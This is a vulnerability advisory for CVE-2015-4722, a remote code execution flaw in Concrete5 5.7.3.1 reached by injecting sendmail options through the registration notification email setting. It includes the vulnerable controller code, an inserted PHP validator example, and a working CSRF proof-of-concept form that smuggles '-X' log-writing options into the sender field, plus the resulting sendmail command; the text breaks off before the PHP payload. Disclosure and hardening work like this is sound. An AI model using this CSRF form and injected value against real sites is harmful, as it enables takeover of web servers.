Edition: 1.0
Last Edit: 24/06/2015
Classification: Not restricted

Sendmail Remote Code Execution Vulnerability in Concrete5 version 5.7.3.1
Author: Egidio Romano
RCE via Sendmail in Concrete5 version 5.7.3.1
Edition: v1.0 Date: 24/06/2015
Not restricted Page 1/3
Summary

Vulnerability Class: Remote Code Execution (RCE)
CVE ID: CVE-2015-4722
Remote: Yes
Local: No
Published: June 6, 2015
Updated: June 24, 2015
Credit: Egidio Romano
Vulnerable Version: 5.7.3.1 and probably prior versions
Fixed On: 5.7.4
Other References:
  https://hackerone.com/reports/59663
  http://blog.mindedsecurity.com/2015/06/multiple-security-issues-discovered-in-concrete5-part1.html
Description

Concrete5 is vulnerable to Remote Code Execution because it fails to properly validate
certain user input that is used as the sender email address when sending out a registration
notification email. This vulnerability is mitigated by the fact that it can be exploited only
by authenticated administrator users (although it could also be reached through a Cross-Site
Request Forgery attack against such a user) and only if the email is sent with sendmail.
Vulnerability Details

The vulnerable code is located within the Open::update_registration_type() method:
File: /concrete/controllers/single_page/dashboard/system/registration/open.php (lines 13-53):

    if ($this->isPost()) {
        Config::save('concrete.user.registration.email_registration', ($this->post('email_as_username') ? true : false));
        Config::save('concrete.user.registration.type', $this->post('registration_type'));
        Config::save('concrete.user.registration.captcha', ($this->post('enable_registration_captcha')) ? true : false);
        switch ($this->post('registration_type')) {
            case "enabled":
                Config::save('concrete.user.registration.enabled', true);
                Config::save('concrete.user.registration.validate_email', false);
                Config::save('concrete.user.registration.approval', false);
                Config::save('concrete.user.registration.notification', $this->post('register_notification'));
                Config::save(
                    'concrete.user.registration.notification_email',
                    Loader::helper('security')->sanitizeString(
                        $this->post('register_notification_email')));
                …
User input passed through the "register_notification_email" POST parameter is not
properly validated before being stored in a configuration setting: the sanitizeString()
helper does not check that the value is a valid email address. The stored value is later
used as the sender address of the notification email that is sent when a new user registers.
That email is sent with the PHP mail() function, and the value is passed in its fifth
parameter (additional_parameters), which PHP appends to the sendmail command line. When
sendmail is the configured transport, an attacker can therefore inject additional sendmail
options and, with the -X option, make sendmail write a transcript of all the email traffic
to a file of the attacker's choosing, which results in arbitrary PHP code execution.
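As an added example (not Concrete5 code), the hardened counterpart of the check above: a PHP validator that rejects a sender address before it can reach mail()'s fifth parameter, tried against a legitimate address, the injection string from this advisory, and a quoted-local-part address that filter_var() alone would accept. The function names are my own.

```php
<?php
// Added example, not Concrete5 code: validate a user-supplied sender address
// before it is placed in mail()'s fifth parameter (additional_parameters),
// which PHP appends to the sendmail command line.

/**
 * Return the address if it is a single plain mailbox that is safe to put on
 * a sendmail command line, or null if it must be rejected.
 */
function safe_sender_address(string $candidate): ?string
{
    $candidate = trim($candidate);

    // A syntax check that sanitizeString() never performs. The advisory's
    // injection string is already rejected here because of its unquoted spaces.
    if (filter_var($candidate, FILTER_VALIDATE_EMAIL) === false) {
        return null;
    }

    // FILTER_VALIDATE_EMAIL accepts RFC 5321 quoted local parts such as
    // "x y"@example.com, which may contain spaces and quotes. A conservative
    // allowlist (first character alphanumeric, so no leading option dash)
    // keeps only addresses that form a single shell word.
    $plain = '/^[A-Za-z0-9][A-Za-z0-9._%+-]*@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$/';
    if (!preg_match($plain, $candidate)) {
        return null;
    }

    return $candidate;
}

/**
 * Build the additional_parameters string for mail(), or return null when the
 * sender is unusable (the caller should then fall back to a fixed,
 * server-configured envelope sender rather than send with the bad value).
 */
function sendmail_extra_params(string $sender): ?string
{
    $safe = safe_sender_address($sender);
    if ($safe === null) {
        return null;
    }
    // escapeshellarg() is a second layer: the value stays one quoted
    // argument even if the validation above were loosened later.
    return '-f' . escapeshellarg($safe);
}

// Constructed inputs: a legitimate address, the injection string from this
// advisory, and a quoted-local-part address that passes filter_var() alone.
$inputs = [
    'admin@example.com',
    'a@b.com -OQueueDirectory=/tmp -X /var/www/concrete5/updates/test.php',
    '"x y"@example.com',
];

foreach ($inputs as $in) {
    $params = sendmail_extra_params($in);
    printf("%-72s => %s\n", $in, $params ?? 'REJECTED');
}
```

Only the first input yields a parameter string; the other two are rejected before anything is handed to mail().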
Exploitation Details

An attacker can leverage a CSRF vulnerability related to the Public Registration Settings to
force an authenticated administrator user into browsing to a web page like this:

    <html>
    <body>
    <form method="POST" action="http://[host]/index.php/dashboard/system/registration/open/update_registration_type">
    <input type="hidden" name="registration_type" value="enabled">
    <input type="hidden" name="register_notification" value="1">
    <input type="hidden" name="register_notification_email" value="a@b.com -OQueueDirectory=/tmp -X /var/www/concrete5/updates/test.php">
    <input type="hidden" name="ccm-submit-registration-type-form" value="Save">
    </form><script>document.forms[0].submit()</script>
    </body>
    </html>
When the victim browses to this page, the Public Registration Settings are modified so that,
whenever a new user registers, the following command line is executed to send the
notification email (if sendmail is in use):

    /usr/sbin/sendmail -t -i -f a@b.com -OQueueDirectory=/tmp -X /var/www/concrete5/updates/test.php

This logs all the email traffic into a test.php file inside the /updates/ directory of the
Concrete5 webroot (which should be writable by the user running the web server). The
attacker's next step is to register a new account, placing some malicious PHP code after
the email address, something like this:
When the new account is created a notification email is sent, and the attacker can then
browse to http://[host]/updates/test.php to execute the injected PHP code:
